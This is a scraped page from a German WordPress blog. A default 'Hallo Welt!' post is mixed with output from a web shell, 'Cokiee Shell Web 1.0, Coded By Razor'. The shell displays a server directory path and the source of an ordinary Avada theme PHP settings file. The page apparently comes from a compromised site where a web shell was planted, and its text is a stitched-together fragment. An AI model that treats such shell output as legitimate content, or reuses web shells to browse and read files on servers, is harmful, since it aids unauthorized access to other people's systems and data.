Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/themes/Avada/includes/metaboxes/tabs/ |
Current File : //var/www/web28/html/wp-content/themes/Avada/includes/metaboxes/tabs/tab_off_canvas_conditions.php |
<?php /** * Off Canvas triggers Metabox options. * * @author ThemeFusion * @copyright (c) Copyright by ThemeFusion * @link https://avada.com * @package Avada * @subpackage off-canvas */ /** * Off Canvas conditions settings * * @param array $sections An array of our sections. * @return array */ function avada_page_options_tab_off_canvas_conditions( $sections ) { $sections['off_canvas_conditions'] = [ 'label' => esc_html__( 'Conditions', 'Avada' ), 'alt_icon' => 'fusiona-conditions', 'id' => 'off_canvas_conditions', 'fields' => [ 'conditions_enabled' => [ 'type' => 'radio-buttonset', 'label' => esc_html__( 'Enable Conditions', 'Avada' ), 'description' => __( 'Set conditions for displaying Off Canvas. <strong>NOTE:</strong> When this is disabled, Off Canvas can only be displayed using the Off Canvas Toggle om the Avada Special Menu Items.', 'Avada' ), 'id' => 'conditions_enabled', 'default' => 'no', 'transport' => 'postMessage', 'choices' => [ 'yes' => esc_html__( 'Yes', 'Avada' ), 'no' => esc_html__( 'No', 'Avada' ), ], ], 'layout_conditions' => [ 'type' => 'layout_conditions', 'label' => esc_html__( 'Conditions', 'Avada' ), 'description' => esc_html__( 'Load Off Canvas on these pages.', 'Avada' ), 'id' => 'layout_conditions', 'transport' => 'postMessage', 'dependency' => [ [ 'field' => 'conditions_enabled', 'value' => 'yes', 'comparison' => '==', ], ], ], ], ]; return apply_filters( 'avada_off_canvas_conditions_sections', $sections ); }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare